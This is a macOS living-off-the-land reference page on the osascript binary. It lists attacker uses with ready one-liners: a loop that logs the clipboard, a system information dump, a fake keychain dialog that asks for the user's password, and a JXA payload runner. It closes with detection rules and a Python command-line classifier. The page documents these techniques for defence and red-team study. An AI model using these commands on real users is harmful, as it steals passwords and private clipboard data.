osascript
Created by Cedric Owens (@cedowens)
Description
The osascript binary is a command-line utility included in macOS that allows users to run AppleScript and Open Scripting Architecture (OSA) scripts or commands. AppleScript is a scripting language designed for power users to automate tasks and application actions and to interact with the operating system.
Created | Tactics | Tags |
---|---|---|
2023-04-19 | Collection, Credential Access, Discovery, Execution | clipboard, bash, oneliner, osascript, systeminfo, prompt, jxa |
Paths
/usr/bin/osascript
Use Cases
Use the osascript binary to gather sensitive clipboard data
A bash loop can gather clipboard contents over a defined time period. The following command calls /usr/bin/osascript -e 'return (the clipboard)' every 10 seconds, indefinitely, and appends the clipboard content to a text file.
while true; do echo $(osascript -e 'return (the clipboard)') >> clipdata.txt; sleep 10; done
Use the osascript binary to gather system information
osascript can be used to gather the operating system version, current username, user ID, computer name, IP address, and other information.
osascript -e 'return (system info)'
Use the osascript binary to prompt the user for credentials
osascript can be used to generate a dialog box that asks the user to enter the keychain password.
osascript -e 'set popup to display dialog "Keychain Access wants to use the login keychain" & return & return & "Please enter the keychain password" & return default answer "" with icon file "System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:FileVaultIcon.icns" with title "Authentication Needed" with hidden answer'
Use the osascript binary to execute a JXA (JavaScript for Automation) file
JXA is often used by red teams (and potentially attackers) as a macOS payload, as JXA is native to macOS and can access various internal macOS APIs (such as Cocoa, Foundation, OSAKit, etc.). The osascript binary can be used to execute JXA payloads by simply running "osascript [file.js]" but some malware or offensive tools may also use "osascript -l JavaScript [file.js]".
echo "ObjC.import('Cocoa');\nObjC.import('stdlib');\nvar currentApp = Application.currentApplication();\ncurrentApp.includeStandardAdditions = true;\ncurrentApp.doShellScript('open -a Calculator.app');" > calc.js && osascript -l JavaScript calc.js
Detections
Command Line Argument Detection (args contain osascript AND -e AND clipboard)
Jamf Protect: Detect activity that is related to osascript gathering clipboard content
Jamf Protect: Detect activity that is related to osascript pulling system information
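The command-line rule above (args contain osascript AND -e AND clipboard), written as a small classifier over process command lines. This is an added example, not code from this page or from Jamf Protect; it goes beyond the single clipboard rule to cover the system info, credential prompt and JXA use cases described earlier. The rule names, the matched substrings other than "clipboard", and the sample command lines are assumptions constructed for illustration.

```python
import os
import shlex

# Substrings that must all appear in the inline (-e) script text.
# "clipboard" is the page's rule; the other rules and all rule names are
# assumptions derived from the page's use cases, not vendor analytics.
INLINE_RULES = {
    "clipboard_read": ("clipboard",),
    "system_info": ("system info",),
    "hidden_answer_prompt": ("display dialog", "hidden answer"),
}

def classify(command_line):
    """Return the sorted rule names matched by one process command line."""
    try:
        argv = shlex.split(command_line)
    except ValueError:  # unbalanced quotes in telemetry: plain split instead
        argv = command_line.split()
    if not argv or os.path.basename(argv[0]) != "osascript":
        return []
    hits, inline, i = set(), [], 1
    while i < len(argv):
        arg = argv[i]
        if arg[:2] in ("-e", "-l"):
            # Option value is either attached (-eSCRIPT, assumed getopt-style
            # parsing) or the next argument.
            value = arg[2:]
            if not value and i + 1 < len(argv):
                i += 1
                value = argv[i]
            if arg[1] == "e":
                inline.append(value.lower())  # AppleScript is case-insensitive
            elif value.lower() == "javascript":
                hits.add("jxa_execution")
        i += 1
    script = " ".join(inline)
    for name, needles in INLINE_RULES.items():
        if all(n in script for n in needles):
            hits.add(name)
    return sorted(hits)

# Constructed sample command lines (not captured telemetry).
SAMPLES = [
    "/usr/bin/osascript -e 'return (the clipboard)'",
    "osascript -e 'return (system info)'",
    "osascript -l JavaScript calc.js",
    "osascript -e 'tell application \"Finder\" to activate'",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), line)
```

Matching on the parsed -e value rather than the raw command line keeps a file path or unrelated process that merely contains the word "clipboard" from firing the rule.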